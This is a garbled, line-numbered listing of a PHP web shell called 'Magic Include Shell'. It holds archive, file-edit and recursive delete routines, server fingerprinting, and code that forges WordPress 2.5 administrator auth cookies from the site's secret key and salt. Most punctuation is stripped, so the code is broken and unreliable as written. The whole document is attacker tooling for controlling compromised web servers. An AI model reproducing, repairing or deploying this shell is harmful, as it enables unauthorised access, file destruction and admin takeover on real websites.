Title: <?php
2/Magic Include Shell by Mag icq 884888/
3 /From Russia With Love/
6 7class zipfile
8 9 var datasec array()
10 var ctrl_dir array()
11 var eof_ctrl_dir "\x50\x4b\x05\x06\x00\x00\
12 var old_offset 0
13 function unix2DosTime(unixtime 0)
14 timearray (unixtime 0) ? getdate()
15 if (timearray'year' lt 1980)
16 timearray'year' 1980
17 timearray'mon' 1
18 timearray'mday' 1
19 timearray'hours' 0
20 timearray'minutes' 0
21 timearray'seconds' 0
22 23 return ((timearray'year' - 1980) ltlt
25) (timearray'mon' ltlt 21)
(timearray'mday' ltlt 16)
24 (timearray'hours' ltlt 11)
(timearray'minutes' ltlt 5) (timearray'second
s' gtgt 1)
25 26 function addDir(name)
27 28 name str_replace("\\", "/", name)
29 fr "\x50\x4b\x03\x04"
30 fr . "\x0a\x00"
31 fr . "\x00\x00"
32 fr . "\x00\x00"
33 fr . "\x00\x00\x00\x00"
34 fr . pack("V",0)
35 fr . pack("V",0)
36 fr . pack("V",0)
37 fr . pack("v", strlen(name) )
38 fr . pack("v", 0 )
39 fr . name
40 fr . pack("V",crc)
41 fr . pack("V",c_len)
42 fr . pack("V",unc_len)
43 this -gt datasec fr
44 new_offset strlen(implode("",
45 cdrec "\x50\x4b\x01\x02"
46 cdrec ."\x00\x00"
47 cdrec ."\x0a\x00"
48 cdrec ."\x00\x00"
49 cdrec ."\x00\x00"
50 cdrec ."\x00\x00\x00\x00"
51 cdrec . pack("V",0)
52 cdrec . pack("V",0)
53 cdrec . pack("V",0)
54 cdrec . pack("v", strlen(name) )
55 cdrec . pack("v", 0 )
56 cdrec . pack("v", 0 )
57 cdrec . pack("v", 0 )
58 cdrec . pack("v", 0 )
59 ext "\x00\x00\x10\x00"
60 ext "\xff\xff\xff\xff"
61 cdrec . pack("V", 16 )
62 cdrec . pack("V", this -gt old_offset
63 this -gt old_offset new_offset
64 cdrec . name
65 this -gt ctrl_dir cdrec
66 67 function addFile(data, name, time 0)
68 69 name str_replace('\\', '/',
70 name str_replace(array('../','./'),
'', name)
71 dtime dechex(this-gtunix2DosTime(ti
72 hexdtime '\x' . dtime6 . dtime7
73 . '\x' . dtime4 . dtime5
74 . '\x' . dtime2 . dtime3
75 . '\x' . dtime0 . dtime1
76 eval('hexdtime "' . hexdtime . '"')
77 fr "\x50\x4b\x03\x04"
78 fr . "\x14\x00"
79 fr . "\x00\x00"
80 fr . "\x08\x00"
81 fr . hexdtime
82 unc_len strlen(data)
83 crc crc32(data)
84 zdata gzcompress(data)
85 zdata substr(substr(zdata, 0,
strlen(zdata) - 4), 2)
86 c_len strlen(zdata)
87 fr . pack('V', crc)
88 fr . pack('V', c_len)
89 fr . pack('V', unc_len)
90 fr . pack('v', strlen(name))
91 fr . pack('v', 0)
92 fr . name
93 fr . zdata
94 fr . pack('V', crc)
95 fr . pack('V', c_len)
96 fr . pack('V', unc_len)
97 this -gt datasec fr
98 cdrec "\x50\x4b\x01\x02"
99 cdrec . "\x00\x00"
100 cdrec . "\x14\x00"
101 cdrec . "\x00\x00"
102 cdrec . "\x08\x00"
103 cdrec . hexdtime
104 cdrec . pack('V', crc)
105 cdrec . pack('V', c_len)
106 cdrec . pack('V', unc_len)
107 cdrec . pack('v', strlen(name) )
108 cdrec . pack('v', 0 )
109 cdrec . pack('v', 0 )
110 cdrec . pack('v', 0 )
111 cdrec . pack('v', 0 )
112 cdrec . pack('V', 32 )
113 cdrec . pack('V', this -gt old_offset )
114 this -gt old_offset strlen(fr)
115 cdrec . name
116 this -gt ctrl_dir cdrec
117 118 function file()
119 120 data implode('', this -gt datasec)
121 ctrldir implode('', this -gt
122 return
123 data .
124 ctrldir .
125 this -gt eof_ctrl_dir .
126 pack('v', sizeof(this -gt ctrl_dir))
127 pack('v', sizeof(this -gt ctrl_dir))
128 pack('V', strlen(ctrldir)) .
129 pack('V', strlen(data)) .
130 "\x00\x00"
131 132 function addFiles(files)
133 134 foreach(files as file)
135 136 if (is_file(file))
137 138 data implode("",file(file))
139 this-gtaddFile(data,file)
140 141 142 143 function output(file)
144 145 fpfopen(file,"w")
146 fwrite(fp,this-gtfile())
147 fclose(fp)
148 149 150 class SimpleUnzip
151 var Comment ''
152 var Entries array()
153 var Name ''
154 var Size 0
155 var Time 0
156 function SimpleUnzip(in_FileName '')
157 158 if (in_FileName ! '')
159 SimpleUnzipReadFile(in_FileName
160 161 162 function Count()
163 164 return count(this-gtEntries)
165 166 function GetData(in_Index)
167 168 return this-gtEntriesin_Index-gtData
169 170 function GetEntry(in_Index)
171 172 return this-gtEntriesin_Index
173 174 function GetError(in_Index)
175 176 return this-gtEntriesin_Index-gtErro
177 178 function GetErrorMsg(in_Index)
179 180 return this-gtEntriesin_Index-gtErro
181 182 function GetName(in_Index)
183 184 return this-gtEntriesin_Index-gtName
185 186 function GetPath(in_Index)
187 188 return this-gtEntriesin_Index-gtPath
189 190 function GetTime(in_Index)
191 192 return this-gtEntriesin_Index-gtTime
193 194 function ReadFile(in_FileName)
195 196 this-gtEntries array()
197 this-gtName in_FileName
198 this-gtTime filemtime(in_FileName)
199 this-gtSize filesize(in_FileName)
200 oF fopen(in_FileName, 'rb')
201 vZ fread(oF, this-gtSize)
202 fclose(oF)
203 aE explode("\x50\x4b\x05\x06",
204 aP unpack('x16/v1CL', aE1)
205 this-gtComment substr(aE1, 18,
206 this-gtComment strtr(this-gtComment,
array("\r\n" gt "\n","\r" gt "\n"))
207 aE explode("\x50\x4b\x01\x02",
208 aE explode("\x50\x4b\x03\x04",
209 array_shift(aE)
210 foreach (aE as vZ)
211 aI array()
212 aI'E' 0
213 aI'EM' ''
214 aP unpack('v1VN/v1GPF/v1CM/v1FT
/v1FD/V1CRC/V1CS/V1UCS/v1FNL', vZ)
215 bE (aP'GPF' 0x0001) ?
216 nF aP'FNL'
217 if (aP'GPF' 0x0008)
218 aP1 unpack('V1CRC/V1CS/V1UC
S', substr(vZ, -12))
219 aP'CRC' aP1'CRC'
220 aP'CS' aP1'CS'
221 aP'UCS' aP1'UCS'
222 vZ substr(vZ, 0, -12)
223 224 aI'N' substr(vZ, 26, nF)
225 if (substr(aI'N', -1) '/')
226 continue
227 228 aI'P' dirname(aI'N')
229 aI'P' aI'P' '.' ? ''
230 aI'N' basename(aI'N')
231 vZ substr(vZ, 26 nF)
232 if (strlen(vZ) ! aP'CS')
233 aI'E' 1
234 aI'EM' 'Compressed size is
not equal with the value in header information.'
235 else
236 if (bE)
237 aI'E' 5
238 aI'EM' 'File is
encrypted, which is not supported from this
239 else
240 switch(aP'CM')
241 case 0
242 break
243 case 8
244 vZ
245 break
246 case 12
247 if (!
248 if
(strtoupper(substr(PHP_OS, 0, 3)) 'WIN')
249 _at_dl('php_bz2.dll')
250 else
251 _at_dl('bz2.so')
252 253 254 if
255 vZ
256 else
257 aI'E' 7
258 aI'EM'
"PHP BZIP2 extension not available."
259 260 break
261 default
262 aI'E' 6
263 aI'EM'
"De-/Compression method aP'CM' is not
264 265 if (! aI'E')
266 if (vZ FALSE)
267 aI'E' 2
268 aI'EM'
'Decompression of data failed.'
269 else
270 if (strlen(vZ)
! aP'UCS')
271 aI'E' 3
272 aI'EM'
'Uncompressed size is not equal with the value in
header information.'
273 else
274 if
(crc32(vZ) ! aP'CRC')
275 aI'E'
276 aI'EM'
'CRC32 checksum is not equal with the value in
header information.'
277 278 279 280 281 282 283 aI'D' vZ
284 aI'T' mktime((aP'FT'
0xf800) gtgt 11,
285 (aP'FT'
0x07e0) gtgt 5,
286 (aP'FT'
0x001f) ltlt 1,
287 (aP'FD'
0x01e0) gtgt 5,
288 (aP'FD'
289 ((aP'FD'
0xfe00) gtgt 9) 1980)
290 this-gtEntries new
291 292 return this-gtEntries
293 294 295 class SimpleUnzipEntry
296 var Data ''
297 var Error 0
298 var ErrorMsg ''
299 var Name ''
300 var Path ''
301 var Time 0
302 function SimpleUnzipEntry(in_Entry)
303 304 this-gtData in_Entry'D'
305 this-gtError in_Entry'E'
306 this-gtErrorMsg in_Entry'EM'
307 this-gtName in_Entry'N'
308 this-gtPath in_Entry'P'
309 this-gtTime in_Entry'T'
310 311 312 function unzipFile(filename, destination_folder
313 if (substr(destination_folder, -1) !
314 destination_folder
destination_folder .'/'
315 316 vzip new SimpleUnzip(filename)
317 foreach (vzip-gtEntries as extr)
318 path extr-gtPath
319 path_folder explode ('/', path)
320 new_path ''
321 foreach (path_folder as
322 new_path . folder .'/'
323 to_create
destination_folder . new_path
324 if (substr(to_create,
-1) '/')
325 to_create
substr(to_create, 0, strlen(to_create)-1)
326 327 _at_mkdir(to_create, 0777)
328 329 new_path ''
330 filev fopen (destination_folder.
extr-gtPath .'/'. extr-gtName, 'w')
331 fwrite (filev, extr-gtData)
332 fclose (filev)
333 334 335 function dd(file)
- if (is_dir(file) is_file(file))
336 chmod(file,0777)
337 handle opendir(file)
338 while(filename readdir(handle))
339 if (filename ! "." filename ! "..")
340 closedir(handle)
341 if(_at_rmdir(file))
- print "file deleted!ltbr/gt"
- else
- print "file delete error!ltbr/gt"
342 343 if(_at_unlink(file))
- print "file deleted!ltbr/gt"
- else
- print "file delete error!ltbr/gt"
344 345 346 function add2zipfile(file)
347 chmod(file,0777)
348 handle opendir(file)
349 while(filename readdir(handle))
350 if (filename ! "." filename ! "..")
- archive.add2zipfile(rtrim(file,'/').'/'.filena
me).',,' - //archive.rtrim(file,'/').'/'.filename.',,'
351 closedir(handle)
352 return archive
353 354 archive.file
355 return archive
356 357 358 function U_sapi()
359 360 switch(PHP_SAPI)
361 362 case 'apache2handler' return 'Apache
2.0 Handler'
363 case 'apache' return 'Apache'
364 case 'cgi' return 'CGI'
365 case 'cgi-fcgi' return
366 default return PHP_SAPI
367 368 369 function U_getos()
370 371 if (function_exists('php_uname')) return
372 if (PHP_OS 'WINNT')
373 return 'Windows NT'
374 return PHP_OS
375 376sitePHP_SELF
377if(defined('WPLANG') isset(_POSTadmin_cookies
) ereg('2\.5',wp_version))
378 379function wp_salt()
- global wp_default_secret_key
- secret_key ''
- if ( defined('SECRET_KEY') ('' ! SECRET_KEY)
( wp_default_secret_key ! SECRET_KEY) ) - secret_key SECRET_KEY
- if ( defined('SECRET_SALT') )
- else
- salt get_option('secret')
- if ( empty(salt) )
- salt wp_generate_password()
- update_option('secret', salt)
- return apply_filters('salt', secret_key . salt)
380 381function wp_hash(data)
- salt wp_salt()
- if ( function_exists('hash_hmac') )
- return hash_hmac('md5', data, salt)
- else
- return md5(data . salt)
382 383function wp_generate_auth_cookie(expiration)
- key wp_hash('admin' . expiration)
- hash hash_hmac('md5', 'admin' . expiration,
key) - cookie 'admin' . '' . expiration . '' .
hash - return cookie
384 385 386header("Content-type text/html")
391(empty(dira) !isset(dira)) ? dira'./' ''
392if(!ereg("/",dira)) diradira.'/'
395if(isset(_POST'filee') !empty(_POST'filee'
402if(isset(_POST'edit') !empty(_POST'edit')
404elseif(isset(_GET'edit') !empty(_GET'edit'
407function cutter(str,sym,len)
411str1 substr(str,0,strpos(str,sym))
412str2 substr(str,strpos(str,sym)len,strlen(
413str str1.str2
414 415 while(serr0)
416return str
417 418kveryacutter(_SERVER"QUERY_STRING",'dira',99
420 421kveryastr_replace('','',kverya)
422 423?gt
426lttitlegtMagic Include Shell lt?php echo ver
427ltSTYLE fprolloverstylegt
428ACOLOR 00ff00
000000 BORDER-BOTTOM-COLOR 000000 FONT 12px
Verdana, Arial, Helvetica, sans-serif COLOR
00ff00 BORDER-TOP-COLOR 000000